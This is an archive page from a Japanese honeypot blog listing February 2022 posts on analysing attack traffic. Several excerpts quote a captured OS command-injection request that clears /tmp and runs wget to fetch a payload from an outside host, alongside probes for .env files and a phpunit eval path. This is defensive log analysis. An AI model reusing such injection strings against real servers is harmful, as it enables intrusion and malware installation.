ハニーレポート

ハニーポット観測レポートを中心に書いていきます。

2022-02-01から1ヶ月間の記事一覧

初めての201リクエストが来たから調べたらやばいところからだった

ハニーポットを構築してからほとんどがGETリクエストでとりあえずつつく攻撃でしたので200レスポンスかログインアクセスをしてくるレスポンスとして401がほとんどでした。 本日のログに初めて201レスポンスを返す攻撃が来ました。 HTTPリクエストに関しては…

はるばるパナマからの大量アクセスwww

2月15日、16日に1000を超えるアクセスがありました。 ipアドレスを日別で集計すると犯人が見つかりました。下記が集計結果です。 2001 2022-02-16 201.218.229.228 2001 2022-02-15 201.218.229.228 1650 2022-02-16 210.210.26.37 541 2022-02-09 60.2…

OSコマンドインジェクションいただきました

下記のログを分析していくよ! 6350 /manager/html 462 / 157 /xmlrpc.php 85 /.env 42 /autodiscover 27 91.218.66.202:4444 27 /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 19 /favicon.ico 17 /shell?cd+/tmp;rm+-rf+*;wget+%20botaflatoon.syt…

URLログ分析 圧倒的管理者権限を取りにイクゥ!

ハニーポットのアクセスログを見ていきます。 ログの集計期間は2/3〜2/16です。 アクセスログの中から10アクセス以上のURLを抽出しました。 6350 /manager/html 462 / 157 /xmlrpc.php 85 /.env 42 /autodiscover 27 91.218.66.202:4444 27 /vendor/phpunit/…

今週のアクセス2/3-2/13

ハニーポットを植えてから10日ほど経ちました。アクセス数を見ます。2月9日のアクセスが急激に伸びてます。基本的には土日のアクセスが多そうですね。急激なアクセスの後はアクセス数70程度で推移しています。この日に何が起きていたのでしょう?? 次…

クラウドサービスからのアクセス!?

今日来たアクセスを分析していきます。 ログの中から下記アクセスを見ていきます。 167.94.146.59 XXXXXXXXXXX "GET / HTTP/1.1" 200 False ※XXXXはマスクしてあります。 167.94.146.59のGETアクセスをしてきています。 base64でエンコードされている部分を…

正常に応答しなかったログの分析

今日はアクセスログの中で正常応答しなかったログを抽出して、1つのログをピックアップして分析します。 アクセスログの中でHTTPのレスポンスコード200以外の応答をgrepで抽出します。[1] コマンドは以下 cat access_log | grep -v 200 結果例 たくさんの正…

ハニーレポート#7 ログをbase64でデコードしてみる

アクセスログはbase64でエンコードされている部分がWOWHoneypotのアクセスログにあります。この文字列をデコードしてあげると、どんなコマンドを仕掛けているかわかります。1日数十から多い時は数百のアクセスがくるので全てにデコードして分析は非現実的で…

ハニーレポート#6 脆弱性を狙った攻撃を検知

ハニーポットを再構築して3日ほど経ちました。アクセスが早速きているのでログを見てみます。まだ、集計用のスクリプトなど作っていないので今日は不審なHTMLタグ挿入があるか抽出してみます。 ログ抽出用のコマンドはこちら[1] grep -E "<[^>]+>[^<]+<[^>]…

WOWHoneypot構築手順

ハニーポットを作成しましたが設定などメール送信したり、分析用コードを作成のためにpythonライブラリを色々入れたりしてました。これだと再構築したりするときに同じ手順を踏んで構築ができないので作り直して作成方法を記録することにしました。 環境 さ…